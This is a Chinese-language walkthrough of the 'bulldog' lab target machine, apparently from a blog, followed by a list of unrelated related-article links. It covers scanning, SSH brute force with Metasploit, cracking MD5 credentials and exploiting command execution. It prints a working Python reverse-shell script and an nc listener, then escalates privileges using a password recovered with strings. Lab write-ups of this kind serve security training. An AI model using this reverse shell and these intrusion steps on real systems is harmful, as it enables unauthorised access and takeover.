bulldog

  • 实验环境
  • 实验过程
    • 信息收集
      • 1.主机发现
      • 2.端口扫描
      • 3.目录扫描
      • 4.web站指纹
      • 5.漏洞发现
    • 漏洞利用
      • 提权
    • 总结

实验环境

靶机:bulldog
测试机:win10 ,kali

实验过程

信息收集

1.主机发现

靶机ip:192.168.238.146

2.端口扫描

先用masscan进行快速全面的扫描

nmap扫描得到端口服务信息

3.目录扫描

访问80,web服务进行目录扫描

4.web站指纹

以python环境搭建web

5.漏洞发现

1.尝试ssh弱口令:利用msf,hydra等
msf:


设置参数

set pass_file pwd.txt
set rport 23
set rhost 192.168.238.146
set verbose true
run



2.web漏洞
查看目录扫描结果发现:后台登录口: http://192.168.238.131/admin
尝试:sql注入,弱口令,万能密码等尝试登录

webshell界面:http://192.168…238.131/dev

需要身份验证

审查元素发现疑似数据库用户名密码

md5解密

尝试在admin页面,和ssh登录
成功登录admin,但提示不允许仍和编辑操作

回到需身份验证的web界面

发现命令执行漏洞

漏洞利用

结合命令执行写python反弹shell脚本

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.238.131",8080))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

将脚本放在var/www/html下开启apache服务,下载至靶机


kali :nc -nvlp 8080 监听8080端口

拿到shell

提权

python 开启一个终端:

python -c 'import pty; pty.spawn("/bin/bash")'


常规三连 :whoami ,uname -a ,cat etc/issue

在/home/bulldogadmin/.hiddenadmindirectory 目录下 读取customPermissionApp文件

strings customPermissionApp

找到类似密码: SUPERultimatePASSWORDyouCANTget

sudo命令拿到权限

总结

主机发现,nmap -sn ,netdiscover等扫描工具;端口扫描,先masscan进行快速大量的扫描,在nmap 指定端口进行版本,服务等信息搜集,whatweb 进行网站指纹,cms扫描,对收集到的服务版本进行进一步手段,ssh爆破(msf,hydra),登陆口(弱口令,sql注入,万能密码),命令执行漏洞(反弹shell);得到shell后可用python弹一个终端进行操作;提权 :查找关键性文件(apache配置文件,etc/passwd等),查看当前用户是否在sudo组里(sudo su命令输入当前用户密码)

靶机实战(bulldog)相关推荐

  1. 红日安全ATT&CK靶机实战系列之vulnstack2

    typora-root-url: pic\ATT&CK靶机实战系列--vulnstack2 声明 好好学习,天天向上 环境配置 下载地址,直接进去用百度云,没有会员也下的非常快 http:// ...

  2. hdf5 目录没有serial_Serial靶机实战

    原创Jarry 四叶草网络安全学院 今天研究一下php反序列化,靶机serial实战.目标为获取root权限. 靶机信息 可以去vulhub上下载此靶机,下载好,之后,使用Vmware新建虚拟机打开, ...

  3. 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】

    靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...

  4. 靶机测试-bulldog

    测试步骤 信息收集 主机发现 端口及其服务扫描 目录扫描 测试 对应端口服务测试 后台目录寻找漏洞 提权 总结 遇到的问题 信息收集 主机发现 kali IP地址查询,确认靶机存在网段 使用nmap进 ...

  5. DC-5 vulnhub靶机实战

    首先是使用virtualbox安装,这里不推荐vmware,会出很多问题. nmap扫一下子网,看靶机的ip地址: 发现ip是192.168.240.137,开放了80和111端口. 给了提示是个文件 ...

  6. Vulnhub靶机实战——DC-8

    靶机DC-8下载地址: https://download.vulnhub.com/dc/DC-8.zip 环境:VMware 15虚拟机软件 DC-8靶机IP地址:192.168.220.156 Ka ...

  7. Vulnhub-CTF6靶机实战

    前言 靶机下载地址:下载地址 KALI地址:192.168.10.73 靶机地址:192.168.10.40 一.信息收集 1.主机发现 使用命令如下,来进行主机发现 netdiscover -r 1 ...

  8. Vulnhub靶机实战——DC-5

    靶机DC-5下载地址:https://download.vulnhub.com/dc/DC-5.zip 环境:VMware 15虚拟机软件 DC-5靶机IP地址:192.168.220.139 Kal ...

  9. Vulnhub-potato靶机实战

    文章目录 学习笔记下载 靶机下载 第一部分 信息收集 第一步 主机发现 第二步 端口扫描 第三步 访问网站 第四步 扫描目录 第四步 访问扫描出的目录 第五步 回到开放的端口,分析,发现7120开放 ...

最新文章

  1. Sublime Text 3 及Package Control 安装(附上一个3103可用的Key)
  2. Qt Data Visualization
  3. R语言ggplot2可视化绘制多条基本线图(Basic line plot)、使用gghighlight包突出高亮其中的某一条线图(highlight line plot)
  4. 使用eclipse搭建嵌入式开发环境
  5. c#生成一组不同的随机数的方法
  6. 机器学习笔记(二)——多变量最小二乘法
  7. 人工智障学习笔记——强化学习(4)时间差分方法
  8. java怎样自动调用鼠标点击屏幕固定地方_python办公自动化:让PyAutoGUI来帮你干活...
  9. Google Jump Consistent Hash 一致性哈希算法
  10. SQL Server中的版本号
  11. (摘要)100个伟大的商业理念:理念35:引爆流行
  12. Esp8266(4)
  13. springCloud Finchley 实战入门(基于springBoot 2.0.3)【五 Hystrix 服务容错保护】
  14. Python openpyxl文档
  15. Markdown学习笔记
  16. 宏基因组数据分析:差异分析(LEfSe安装使用及LDA score计算)
  17. cgcs2000大地坐标系地图_我国大地坐标系_地图与地图制图
  18. 庄子心得06:总有路可走
  19. MySQL——Using Filesort文件排序详解
  20. android netd和kernelframeworks的通信逻辑

热门文章

  1. redis基础知识:数据结构SDS
  2. QQ网络存储随便用(原创)
  3. 计算机英语输入法怎么,电脑为什么输入法总是英文怎么办
  4. edge浏览器 查看MD文件
  5. php word转化为html,php如何把word转换为html(这里使用COM)
  6. 如何利用泰勒级数展开式计算数学函数的值(SCL代码)
  7. 投资理财学习笔记二,1.4做个有钱人之富人思维
  8. 下载数据库名前加“#”方法
  9. win 10卸载mysql_Windows 10系统下彻底删除卸载MySQL的方法教程
  10. 建站购买服务器前必看:服务器各参数的超详细说明